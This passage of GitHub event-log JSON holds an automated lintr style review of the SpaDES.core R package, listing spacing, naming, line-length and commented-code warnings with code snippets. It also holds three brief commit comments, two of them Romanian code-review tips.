^\n```\n[R/code-checking.R:665:64:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L665) *style:* **Commas should always have a space after.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                               ^\n```\n[R/code-checking.R:665:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/code-checking.R#L665) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      whInner <- any((pd[outerWh,\"line1\"] < lwf) & (pd[outerWh,\"line2\"] > lwf) )\n                                                                              ^\n```\n[R/copy.R:37:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/copy.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            sim_ <- object\n            ^~~~\n```\n[R/downloadData.R:54:96:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/downloadData.R#L54) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    io <- .parseModulePartial(sim, modules = list(module), defineModuleElement = \"inputObjects\" )\n                                                                                               ^\n```\n[R/downloadData.R:242:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/downloadData.R#L242) *style:* **Commented code should be removed.**\n```r\n​    # parsedModule <- parse(file = file.path(path, module, paste0(module, '.R')))\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:243:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/downloadData.R#L243) *style:* **Commented code should be removed.**\n```r\n​    # urls <- .getSourceURL(pattern = fileToDownload, x = parsedModule)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:250:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/downloadData.R#L250) *style:* **Commented code should be removed.**\n```r\n​      #urls <- moduleMetadata(module, path)$inputObjects$sourceURL\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:268:27:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/downloadData.R#L268) *style:* **Commas should always have a space after.**\n```r\n​    chksums2 <- chksums[0,]\n                          ^\n```\n[R/downloadData.R:269:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/downloadData.R#L269) *style:* **Commented code should be removed.**\n```r\n​    #children <- moduleMetadata(module, path)$childModules\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/downloadData.R:272:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n            ^\n```\n[R/downloadData.R:272:18:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                 ^\n```\n[R/downloadData.R:272:54:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                     ^\n```\n[R/downloadData.R:272:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/downloadData.R#L272) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​        if ( all( nzchar(children) & !is.na(children) ) ) {\n                                                       ^\n```\n[R/experiment.R:200:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/experiment.R#L200) *style:* **Commented code should be removed.**\n```r\n​    #sim <- Copy(sim, objects = FALSE, queues = TRUE)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:215:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/experiment.R#L215) *style:* **Commented code should be removed.**\n```r\n​    # cl <- tryCatch(getCluster(), error = function(x) NULL)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:216:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/experiment.R#L216) *style:* **Commented code should be removed.**\n```r\n​    # on.exit(if (!is.null(cl)) returnCluster(), add = TRUE)\n      ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:218:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/experiment.R#L218) *style:* **Commented code should be removed.**\n```r\n​    #if (length(modules) == 0) modules <- list(modules(sim)[-(1:4)])\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:222:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/experiment.R#L222) *style:* **Commented code should be removed.**\n```r\n​        # unlist(params[paramsTmp], recursive = FALSE)\n          ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/experiment.R:314:58:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/experiment.R#L314) *style:* **Commented code should be removed.**\n```r\n​            params(sim_)[[mod[x]]][[param[[x]]]] <- val #factorialExp[ind,x]\n                                                         ^~~~~~~~~~~~~~~~~~~\n```\n[R/helpers.R:230:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/helpers.R#L230) *style:* **Place a space before left parenthesis, except in a function call.**\n```r\n​                             paste0(\"package:\", .pkgEnv$corePackagesVec[-(1:2)]))\n                                                                         ^\n```\n[R/helpers.R:260:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/helpers.R#L260) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​all.equal.simList <- function(target, current, ...) {\n^~~~~~~~~~~~~~~~~\n```\n[R/load.R:198:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/load.R#L198) *style:* **Lines should not be more than 100 characters.**\n```r\n​                names(argument) <- c(nam, names(formals(getFromNamespace(loadFun[y], loadPackage[y])))[1])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/misc-methods.R:467:55:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/misc-methods.R#L467) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​          (inherits(get(w, envir = envir), \"integer\")) ) {\n                                                      ^\n```\n[R/module-define.R:719:63:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-define.R#L719) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​      exts <- na.omit(match(file_ext(fl), .fileExts[, \"exts\"]) )\n                                                              ^\n```\n[R/module-dependencies-class.R:53:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-dependencies-class.R#L53) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​            out.df <- data.frame(\n            ^~~~~~\n```\n[R/module-dependencies-class.R:172:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-dependencies-class.R#L172) *style:* **Commented code should be removed.**\n```r\n​    #   warning(\"input object data.frame should use colnames sourceURL.\")\n        ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-dependencies-class.R:174:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n        ^\n```\n[R/module-dependencies-class.R:174:78:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-dependencies-class.R#L174) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​    if ( !all(colnames(.outputObjects()) %in% colnames(object@outputObjects)) ) {\n                                                                             ^\n```\n[R/module-dependencies-methods.R:43:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-dependencies-methods.R#L43) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- .depsEdgeListMem(deps, plot)\n    ^~\n```\n[R/module-dependencies-methods.R:56:3:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n  ^~~~~~\n```\n[R/module-dependencies-methods.R:56:13:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-dependencies-methods.R#L56) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​  sim.in <- sim.out <- data.table(objectName = character(0),\n            ^~~~~~~\n```\n[R/module-dependencies-methods.R:61:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-dependencies-methods.R#L61) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.in <- as.data.table(x@inputObjects)[, .(objectName, objectClass)]\n      ^~~~\n```\n[R/module-dependencies-methods.R:62:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-dependencies-methods.R#L62) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      z.out <- as.data.table(x@outputObjects)[, .(objectName, objectClass)]\n      ^~~~~\n```\n[R/module-dependencies-methods.R:65:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-dependencies-methods.R#L65) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.in <<- rbindlist(list(sim.in, z.in), use.names = TRUE)\n        ^~~~~~\n```\n[R/module-dependencies-methods.R:68:9:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-dependencies-methods.R#L68) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​        sim.out <<- rbindlist(list(sim.out, z.out), use.names = TRUE)\n        ^~~~~~~\n```\n[R/module-dependencies-methods.R:80:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-dependencies-methods.R#L80) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- dx[, list(from = module, to = i.module,\n    ^~\n```\n[R/module-dependencies-methods.R:83:15:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-dependencies-methods.R#L83) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (plot) DT <- DT[!duplicated(DT[, 1:2, with = FALSE]), ]\n              ^~\n```\n[R/module-dependencies-methods.R:85:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-dependencies-methods.R#L85) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- data.table(from = character(0), to = character(0),\n    ^~\n```\n[R/module-dependencies-methods.R:164:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-dependencies-methods.R#L164) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    M <- distances(simGraph, mode = \"out\")\n    ^\n```\n[R/module-dependencies-methods.R:196:39:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-dependencies-methods.R#L196) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​      missingObjects <- simEdgeList %>% filter(from != to) %>%\n                                    ~~^\n```\n[R/module-dependencies-methods.R:210:26:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-dependencies-methods.R#L210) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​    return(newEdgeList %>% data.table() %>% setorder(\"from\", \"to\", \"objName\"))\n                       ~~^\n```\n[R/module-dependencies-methods.R:246:79:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-dependencies-methods.R#L246) *style:* **Do not place spaces around code in parentheses or square brackets.**\n```r\n​              loadOrder <- names(simGraph[[tsort, ]]) %>% .[!(. %in% \"_INPUT_\" )]\n                                                                              ^\n```\n[R/module-repository.R:28:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-repository.R#L28) *style:* **Lines should not be more than 100 characters.**\n```r\n​#'          (\\url{http://spades-core.predictiveecology.org/articles/ii-modules.html#module-directory-structure-modulename}),\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:52:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-repository.R#L52) *style:* **Lines should not be more than 100 characters.**\n```r\n​    zipFiles <- grep(file.path(name, \"data\"), zipFiles, invert = TRUE, value = TRUE) # remove any zip in data folder\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:293:8:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-repository.R#L293) *style:* **Commented code should be removed.**\n```r\n​      #versionWarning(name, version)\n       ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:305:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-repository.R#L305) *style:* **Lines should not be more than 100 characters.**\n```r\n​        GET(zip, ua, config = list(config(token = pat)), write_disk(localzip, overwrite = overwrite))\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/module-repository.R:401:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-repository.R#L401) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/module-repository.R:402:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/module-repository.R#L402) *style:* **Trailing blank lines are superfluous.**\n```r\n​\n^\n```\n[R/moduleMetadata.R:72:6:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/moduleMetadata.R#L72) *style:* **Commented code should be removed.**\n```r\n​    #metadata <- eval(parse(text = x)) # can't be used because can't evaluate start(sim)\n     ^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:78:5:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting-diagrams.R#L78) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    DT <- tail(completed(sim), n)\n    ^~\n```\n[R/plotting-diagrams.R:173:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting-diagrams.R#L173) *style:* **`%>%` should always have a space before it and a new line after it, unless the full pipeline fits on one line.**\n```r\n​        sapply(ll, NROW) %>% sum() %>% `*`(., 26L)\n                         ~~^\n```\n[R/plotting-diagrams.R:325:7:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting-diagrams.R#L325) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​      PlotRemovingDots <- function(modDia, plotFn, axes, ...,\n      ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:326:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting-diagrams.R#L326) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.color,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:327:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting-diagrams.R#L327) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size,\n                                   ^~~~~~~~~~~\n```\n[R/plotting-diagrams.R:328:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting-diagrams.R#L328) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.size2,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:329:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting-diagrams.R#L329) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.shape,\n                                   ^~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:330:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting-diagrams.R#L330) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.cex,\n                                   ^~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:331:36:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting-diagrams.R#L331) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                                   vertex.label.family,\n                                   ^~~~~~~~~~~~~~~~~~~\n```\n[R/plotting-diagrams.R:345:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting-diagrams.R#L345) *style:* **Lines should not be more than 100 characters.**\n```r\n​          c(nchar(namesModDia)^0.8 * 10) # use exponential to stretch out, and multiplication to make all bigger\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/plotting.R:6:31:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                              ^~~~~~~~\n```\n[R/plotting.R:6:41:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting.R#L6) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                              na.color, zero.color, length){\n                                        ^~~~~~~~~~\n```\n[R/plotting.R:37:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                        ^~~~~~~~\n```\n[R/plotting.R:37:35:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting.R#L37) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        na.color, zero.color, length) {\n                                  ^~~~~~~~~~\n```\n[R/plotting.R:86:22:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                    ~^~\n```\n[R/plotting.R:86:56:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting.R#L86) *style:* **Put spaces around all infix operators.**\n```r\n​      eval(parse(text=deparse(elems[[useElem]])), envir=tmp@.envir),\n                                                      ~^~\n```\n[R/plotting.R:87:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n          ~^~\n```\n[R/plotting.R:87:40:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                      ~^~\n```\n[R/plotting.R:87:74:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/plotting.R#L87) *style:* **Put spaces around all infix operators.**\n```r\n​      error=function(x) eval(parse(text=deparse(elems[[useElem]])), envir=envir))\n                                                                        ~^~\n```\n[R/POM.R:128:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/POM.R#L128) *style:* **Lines should not be more than 100 characters.**\n```r\n​#' @param objFnCompare Character string. Either, \"MAD\" or \"RMSE\" indicating that inside the objective\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:186:12:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/POM.R#L186) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​           NaNRetries = NA, logObjFnVals = FALSE, weights, useLog = FALSE) {\n           ^~~~~~~~~~\n```\n[R/POM.R:196:25:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/POM.R#L196) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​                        NaNRetries, logObjFnVals, weights, useLog) {\n                        ^~~~~~~~~~\n```\n[R/POM.R:213:28:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/POM.R#L213) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​    if (is.na(NaNRetries)) NaNRetries <- 1\n                           ^~~~~~~~~~\n```\n[R/POM.R:237:11:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/POM.R#L237) *style:* **Variable or function name should be lowerCamelCase.**\n```r\n​          sim_ <- Copy(sim)\n          ^~~~\n```\n[R/POM.R:255:66:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/POM.R#L255) *style:* **Put spaces around all infix operators.**\n```r\n​          envPOMCalled <- sys.frame(min(grep(\"POM\", sys.calls()))-1)\n                                                                ~^~\n```\n[R/POM.R:322:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/POM.R#L322) *style:* **Lines should not be more than 100 characters.**\n```r\n​          cat(format(unlist(lapply(objectiveRes, function(x) x[[\"value\"]])), digits = 4), dep = \"\\t\")\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n[R/POM.R:360:1:](https://github.com/PredictiveEcology/SpaDES.core/blob/fdf21a0c5bdc1d7d7ebb513096b56f5d5dbf50ec/R/POM.R#L360) *style:* **Lines should not be more than 100 characters.**\n```r\n​      par[whP] <- unlist(deps[[modName]]@parameters$default[deps[[modName]]@parameters$paramName == names(P(sim, modName)[whParamsByMod[whP]])])\n^~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~\n```\n"}},"created_at":"2018-07-18T19:23:42Z"}
{"id":"7984973593","type":"CommitCommentEvent","actor":{"login":"cristealucian97"},"repo":{"name":"cristealucian97/homeautomationbeta"},"payload":{"comment":{"id":29754829,"position":49,"line":98,"path":"rest_api_impl/src/test/java/com/home/automation/rest_api_impl/dashboard/DashboardControllerTest.java","commit_id":"28b35a3283826fcf97f60515004592781b6f9383","created_at":"2018-07-18T19:23:47Z","updated_at":"2018-07-18T19:23:47Z","author_association":"OWNER","body":"Nu ai nevoie de asta"}},"created_at":"2018-07-18T19:23:47Z"}
{"id":"7984976832","type":"CommitCommentEvent","actor":{"login":"MarianFilipovici"},"repo":{"name":"ionut-cristinel/PentaStagiuVara2018Homework"},"payload":{"comment":{"id":29754836,"position":25,"line":25,"path":"Module03Week01/Homework01/Controllers/MessagesController.cs","commit_id":"e5e22c62056d433a4ba2260211b1d1526245aa66","created_at":"2018-07-18T19:24:27Z","updated_at":"2018-07-18T19:24:27Z","author_association":"NONE","body":"E bine sa te obisnuiesti sa pui acoladele mereu, chiar daca ai o singura linie dupa if, e o regula foarte intalnita in majoritatea companiilor :)"}},"created_at":"2018-07-18T19:24:27Z"}
{"id":"7984977479","type":"CommitCommentEvent","actor":{"login":"CONECTAMIWEB"},"repo":{"name":"CONECTAMIWEB/android"},"payload":{"comment":{"id":29754837,"position":null,"line":null,"path":null,"commit_id":"178f9c7eb99aadd05ad969cbfd2c65dfdc1ed5a4","created_at":"2018-07-18T19:24:35Z","updated_at":"2018-07-18T19:24:35Z","author_association":"OWNER","body":"///ccc"}},"created_at":"2018-07-18T19:24:35Z"}
